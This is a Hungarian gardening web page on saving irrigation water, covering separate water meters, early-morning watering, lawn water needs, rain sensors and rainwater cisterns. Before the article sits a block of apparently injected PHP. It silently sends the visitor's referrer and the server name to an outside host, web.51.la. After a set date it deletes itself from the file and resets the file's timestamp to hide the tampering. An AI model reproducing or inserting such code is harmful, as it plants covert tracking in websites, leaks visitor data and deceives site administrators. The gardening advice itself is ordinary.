check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hogyan takarékoskodjunk az öntözővízzel?

Hogyan takarékoskodjunk az öntözővízzel?

 

A víz igen nagy kincs. Tudjuk, hogy eszmei értékén kívül ára is van, még ha kútból nyerjük is, ezért úgy járunk jól, ha mindig a megfelelő mennyiséget használunk belőle a kertben is.

 

Hogyan spórolhatunk vele? Külön vízórát szereltessünk fel az öntözésre. Ha vezetékes vízzel öntözünk, célszerű egy külön vízórát felszerelni a kertben felhasznált öntözővíznek, ebben az esetben a csatornázási díjat nem kell kifizetni. Ezt a munkát egy vízvezeték szerelő tudja megtenni, bár a vízóra is pénzbe kerül. A befektetett összeg viszont egy aszályos időszakban 1-2 hónap alatt megtérül. Az öntözőrendszert mindig az éjszakai és hajnali órákra programozzuk. A nappali öntözés nem azért rossz, mert a fű „sokkot” kap a hideg kútvíztől, hanem, mert ilyenkor a párolgási veszteségünk akár 30-40%-kal is több lehet az éjszakai, hajnali öntözéshez képest. A legjobb hajnal 4-től, reggel 9-ig bezárólag öntözni, mert akkor a fű már felszárad, a víz a talajba tud szivárogni. Reggel mire munkába indulunk az öntözőrendszer el is végezte helyettünk az öntözési feladatot és hazaérve az üde zöld kertünk fogad. A párolgás is ilyenkor a legkisebb. Fontos, hogy megfelelő mennyiségű vízzel öntözzünk. A gyep vízigénye az időjárástól függ leginkább. 1-7 mm szükséglete van naponta. Ez egy borongós párás időben 1 mm, kánikulában pedig 7 mm. Ez nem feltétlenül jelenti azt, hogy minden nap kell öntözni, hanem, hogy ennyit párologtat el naponta. Ha kétnaponta áll módunkban öntözni, akkor kétszer ennyi vizet juttassunk a gyepre. A túlöntözés nem csak felesleges pénzkidobás, de a gyepnek sem tesz jót. Ilyen esetben számolnunk kell a talajerózióval, amit szintén a pénztárcánk fog bánni. A fű könnyebben elkezd gombásodni, és sárguló foltok jelennek meg rajta. Megtelepszik a moha, és idővel fű is kipusztul. A megfelelő mennyiségű öntözést esőérzékelővel kiegészítve tudjuk beállítani, ami figyeli a természetes csapadék mennyiségét és letiltja az öntözőrendszerünket, ha szükséges. Vannak olyanok, amik már a hőmérséklet alapján is kiszámítják a kijuttatandó vízszükségletet. Természetesen ezeket jól kell beállítani. Az esővizet gyűjtsük össze, és azzal öntözzünk! Sok új házat eleve úgy építenek, hogy egy nagy víztározót építenek a föld alá, amibe az esővíz össze tud gyűlni. Ezek a ciszternák, amelyek a tetőről összegyűlő esővizet tárolják, akár 1000 m2 öntözésére is elegendők lehetnek. Aszályosabb időben pedig a kútból, vagy hálózati vízből öntözhetünk. Rendkívül költségkímélő módszer és a környezetet is védjük vele, mert így legalább nem a csatornába kerül az esővíz, hanem vissza a talajba. Ez eleinte költséges befektetés, de egészen biztos megtérül. Figyeljünk oda, hogy öntözőrendszerünk jól legyen beállítva, sehol ne csöpögjön, télen pedig engedjük le a vizet belőle, mert a fagyás, repedést okozhat.

 

A vízzel takarékosan kell bánni, ha így teszünk nem csak a pénztárcánkat, de a környezetünket is óvjuk.

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú